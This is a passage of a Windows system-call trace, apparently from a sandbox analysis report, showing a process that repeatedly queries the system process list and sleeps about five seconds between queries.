ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0138.123] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0138.124] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0138.124] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0138.124] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0138.126] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0138.127] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0138.138] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0138.138] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0138.139] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0138.139] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0138.139] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0138.142] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0138.142] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0138.154] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0138.154] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0138.155] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0138.155] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0138.155] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0138.157] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0138.158] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0138.170] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0138.170] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0138.170] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0138.171] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0138.171] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0138.173] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0138.174] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0138.185] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0138.185] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0138.186] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0138.186] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0138.186] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0138.188] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0138.188] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0138.201] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0138.201] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0138.202] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0138.202] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0138.202] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0138.204] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0138.205] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0138.216] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0138.217] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0138.217] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0138.218] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0138.218] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0138.221] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0138.221] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0138.232] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0138.232] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0138.233] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0138.233] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0138.233] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0138.235] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0138.236] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0138.248] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0138.248] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0138.248] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0138.249] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0138.249] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0138.251] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0138.251] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0138.263] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0138.263] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0138.264] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0138.264] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0138.264] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0138.266] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0138.267] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0138.279] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0138.280] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0138.280] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0138.280] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0138.281] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0138.285] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0138.285] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0138.296] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0138.297] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0138.297] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0138.297] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0138.297] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0138.300] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0138.300] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0138.311] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0138.311] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0138.312] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0138.312] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0138.312] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0138.314] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0138.315] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0138.326] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0138.326] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0138.326] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0138.327] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0138.327] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0138.329] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0138.329] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0138.341] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0138.341] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0138.342] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0138.342] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0138.342] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0138.344] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0138.345] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0138.357] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0138.357] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0138.358] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0138.358] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0138.358] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0138.361] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0138.361] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0138.372] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0138.373] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0138.373] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0138.373] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0138.374] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0138.376] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0138.376] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0138.388] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0138.389] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0138.389] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0138.389] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0138.390] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0138.392] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0138.392] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0138.403] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0138.404] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0138.404] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0138.405] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0138.405] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0138.407] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0138.407] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0138.420] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0138.420] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0138.421] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0138.421] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0138.421] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0138.423] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0138.424] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0138.436] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0138.437] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0138.437] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0138.437] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0138.438] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0138.440] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0138.441] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0138.450] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0138.451] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 